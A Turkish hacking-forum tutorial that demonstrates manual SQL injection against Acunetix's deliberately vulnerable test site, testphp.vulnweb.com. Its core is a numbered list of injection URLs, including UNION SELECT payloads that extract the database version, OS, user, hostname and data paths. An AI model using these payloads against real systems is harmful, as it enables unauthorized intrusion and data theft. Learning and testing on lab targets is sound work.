![m9RCVr.png](https://i.hizliresim.com/m9RCVr.png)
Selamlar Ben Anka Team Junior'dan Rapx13. Bugün sizlere manuel olarak sql enjeksiyon açığı bulunan bir siteden araç kullanmdan komutlarla bilgi çekmeyi göstericeğim.
SQL Nedir ?
![iwxqmay.png](https://i.hizliresim.com/iwxqmay.png)
![1*8z9kgCGk4135r3F5VWAVag.png](https://miro.medium.com/v2/resize:fit:640/format:webp/1*8z9kgCGk4135r3F5VWAVag.png)
SQL (yapılandırılmış sorgu dili) demektir. Adındanda anlaşılcağı için veri aktarımı yazılmış bir alt dildir.
![kbrn6ph.png](https://i.hizliresim.com/kbrn6ph.png)
SQL Enjeksiyon Zafiyeti Nedir ?
![iwxqmay.png](https://i.hizliresim.com/iwxqmay.png)
Genellikle bu açığı kullananlar ona SQLİ derler. Bu açık öyle bi açıktırki açıklar listesinde bi aralar en üst sıradaydı
(hala öylemi bilmiyorum) Bu açıktaki olay görülmemesi gerek verilerin görülmesine sebebiyet vermesidir.
Örneğin sitenizde sizin sunucunuzun ip adresi veya işletim sistemi gibi şeylerin gözükmesi pek hoş olmaz dimi
İşte bu açık böyle bişey. Bizde bugün bunu inceleyip bilgi toplayacağız.
![prbhdmh.png](https://i.hizliresim.com/prbhdmh.png)
İlk olarak Bu işlemi Acunetix yani test vulnwebde yapıcağım yani herhangi bir suç teşkil etmiyicek.
Bu arada çektiğim videoda tables demişim heyecandan kolon olucak o.
Videoda kullandığım parametreler :
1- testphp.vulnweb.com/artists.php?artist=1' (zafiyet varsa hata vermesi için)
2- testphp.vulnweb.com/artists.php?artist=1 and 1=1 sorgu döndü 1=2 olursa dönmez hata verir açık var.
3- testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3 yazınca 3. kolonda açık olduğunu söylüyor.
4- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,version() yazınca versiyon bilgisini verir.
5- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@version_comment. üsttekiyle nerdeyse aynısı.
6- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,version_compile_os. işletim sistemini verir.
7- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@version_compile_machine. mimari bilgisini verir.
8- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,database() uygulama veri tabanını verir.
9- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,user() veri tabanı kullanıcısını verir
10- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@port mysql portunu verir.
11- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@hostname ana sistemin adını verir.
12- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@besedir mysql sunucusunun bulunduğu dizini verir.
13- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@DATADIR mysql datasının bulunduğu dizini verir.
14- testphp.vulnweb.com/artists.php?artist=1 union select 1,2,@@wait_timeout bir sorgu süresini ekrana yazar.
![kbrn6ph.png](https://i.hizliresim.com/kbrn6ph.png)
İzlemek isteyen olursa diye video Daily Motion Linki
![logo.png](https://www.turkhackteam.org/styles/v1/tht/logo.png)
![lbn20fm.png](https://i.hizliresim.com/lbn20fm.png)